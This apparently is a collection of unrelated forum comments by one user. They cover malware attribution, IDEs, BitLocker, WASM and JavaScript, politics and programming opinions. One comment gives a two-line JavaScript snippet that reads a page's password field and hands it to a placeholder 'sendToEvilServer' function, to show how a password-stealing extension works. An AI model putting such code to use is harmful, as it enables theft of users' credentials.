Here’s the original report: https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/

It doesn’t specifically attribute this to the NSA, and it’s very hard to definitively say who created what malware anyways.

That being said, if you read through the report, the details on this really scream “state actor” most probably. The level of modularity, the infrastructure of the C2 server, and the detailed & flexible spying capabilities all point to some government agency more than anything else.

Never read again? These can’t be modified, but they can be read. After all, it’d be pretty useless to store data on a medium than can never be read.

The thing about an IDE is how tightly integrated all of the tools are.

If you list the features individually, surely there’s a way to add most of them to your text editor of choice - but the downside is that they’re now all fairly independent features, may not work as thoroughly or covertly, and you might end up with a slower editor altogether.

Not to say IDEs are the peak of performance - but they tend to provide more robust tooling than is (easily) available in e.g. VSCode/emacs/neovim/whatever.

It’s like using a specialized power tool - it’s not the right tool for every job, it’s probably a bulkier package, but if you know how to use it an IDE can make your life a lot easier for the right workload.

Sure, but I suspect this is the real motivation for the article:

Windows 11 Pro force-enables the software version of BitLocker during installation, without providing a clear way to opt out

It sounds like many people may be using software encryption without realizing it, if Windows 11 Pro uses it by default.

Admittedly I haven’t been looking that hard, but I don’t think I’ve seen a TV for sale in the past 10 years that wasn’t a “smart” TV.

That’s because it makes sense when dynamically creating HTML. HTML is not a programming language, it’s simply markup - so if you want to generate some block of HTML in a loop and later access that block of HTML in JS (e.g. to interact with the UI separate from creating it in the first place), it’s a completely reasonable thing to do.

Just wanted to give props to this super informative comment. Thanks for the write up and relevant links!

TS is “better” but often I feel like just configuring typescript takes up a significant amount of the time you save by using it.

That’s the trick about “gender neutral bathrooms” - they’re just a normal bathroom.

Some businesses have had them for years. Ever been to a place where you just use the room that’s unoccupied? Congratulations! You’ve used a gender neutral bathroom.

Just as JetBrains is not representative of every dev, neither are LSPs. Some developers want a specialized IDE for their language(s), some want a highly customized editor with their language servers. As long as you efficiently produce code that works, who cares what other people use?

You could do HTMX and WASM, but they both have the same problem in that they generally replace elements in the DOM as opposed to interacting with existing elements in the DOM, and most rendering on both HTMX and WASM actually happens through JavaScript calls.

In either case you’re limited to only interact with the DOM at the level of abstraction that the framework provides through “behind the scenes” JavaScript calls which will always be a subset of the DOM manipulation that is possible by directly using JS. At least, until there’s a standard DOM access API for WASM.

It’s not a question of performance - it’s just the fact that you need to use JS to modify the DOM in WASM. Until there is access to the DOM from WASM, there simply will be a place for JS in nearly every web app and it’s not because it’s fast, it’s because there are still certain things just need to be done using JS.

My point is really nothing to do with performance and I agree with the video you’ve linked: WASM is fast enough today. Whenever you can truly stop using JavaScript, I’ll be the first in line. You can already use WASM and eliminate huge portions of JS - but for anything beyond a very simple UI, you always end up with something that needs to be called in JS.

WASM’s biggest holdback is that it cannot directly access the DOM. Until then, JS will still have a prominent place in building anything rendered in a browser.

No worries, the Democrats will do what the party does best with a majority - pretty much nothing.

Enough to say “see? We’re better than the other guys”, but not enough to even nudge the status quo.

A password manager is not the same as a password stealing app, but it uses the same mechanism. E.g. a password manager might use code like:

document.querySelector(‘input[type=“password”]’).value = yourPassword;

This would be placing your password into the password box.

A password stealing app, on the other hand, would use some far more advanced code like:

let yourPassword = document.querySelector(‘input[type=“password”]’).value; sendToEvilServer(yourPassword);

Nowhere is a key logger required or even mentioned for what they’re describing in the article.

Spotify pays artists based on how many listens their songs get, so if you can get a bunch of bots to stream your music over and over you can get a legitimate income stream.

In this case, they’re using their illegal income to pay people to use a botnet to stream their songs - which then means they have a nice legal income instead.

But what if it was an African Swallow?

But have you heard of Rust? Rust has zero-cost abstractions! Zero cost!

Honestly, “it’s better than JavaScript” is a pretty low bar.

I don’t like PHP because I think the syntax is ugly and I’ve only used it on systems that are old and a pain to maintain, but I’ll also very freely admit that I have absolutely not written enough PHP to have an informed opinion on it as a language.

At that point, just make a typescript engine so people don’t have to build their TS projects anymore